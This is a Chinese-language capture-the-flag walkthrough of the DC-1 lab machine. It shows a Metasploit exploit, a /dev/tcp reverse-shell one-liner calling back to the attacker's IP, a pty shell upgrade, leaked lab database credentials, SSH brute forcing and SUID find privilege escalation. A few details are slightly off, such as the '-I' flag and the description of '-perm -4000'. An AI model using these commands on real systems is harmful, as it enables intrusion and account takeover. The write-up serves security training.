- Nmap扫描在线主机,找到DC-1的ip地址
2.扫描其端口号
3. 相应端口进行处理(如:访问80端口、暴力破解22端口)
扫描目录
访问相应的目录,查看是否存在敏感信息
可以看到明显版本信息
- 利用metasploit进行反弹shell的攻击,获取shell
-
找到了第一个flag1
查看下内容
需要我们去找个配置文件
在sites/default/目录下的setting_defaults.php文件中
内容
flag2
* Brute force and dictionary attacks aren't the
* only ways to gain access (and you WILL need access).
* What can you do with these credentials?
*
*/
$databases = array (
'default' =>
array (
'default' =>
array (
'database' => 'drupaldb',
'username' => 'dbuser',
'password' => 'R0ck3t',
'host' => 'localhost',
'port' => '',
'driver' => 'mysql',
获取到了数据库信息,尝试去登陆mysql
失败,因为httpshell是短暂连接,而mysql建立连接需要长连接
通过反弹shell
/bin/bash -I >& /dev/tcp/本主机ip/端口号 0>&1
发现也不能
所以采用第二种办法
输入python -v,发现系统自带Python 2.7.3,通过pty.spawn()获得交互式shell
于是我们进行了又一轮的渗透大战
进入shell ,输入shell 即可
输入以下命令则具有/bin/bash权限le
python -c "import pty;pty.spawn('/bin/bash')"
登陆mysql
首先查看所存在的数据库
然后查看drupaldb里所存在的表
欸有我去,这是什么,用户表啊,看下他不过分吧
密文哈
给我很大的惊吓,但不要怕
方法一
独立创建个账户,利用脚本
用户创建成功
当再次查询表中的数据时,发现如下
创建好后,去登陆网站
在网站中浏览时发现flag3
意思让我们去读取账号密码文件。
于是我进入home目录下,读取flag4.txt
他不让我进入root目录
通过ssh获取shell试试
暴力破解
获取出来账号密码
连接
登陆进来了
权限不够,提权
利用find方法
Find / -perm -4000 查找只有可读权限的文件或命令
然后如下提权
Find ./ aaa -exec ‘/bin/sh’ \;
最后进入到root目录下,读取flag5
学习总结:
收集信息(比如敏感文件),利用收集到的信息获取shell,然后提权,提权方法:通过find命令进行提权,其次就是通过暴力破解获取shell,然后提权进入到root下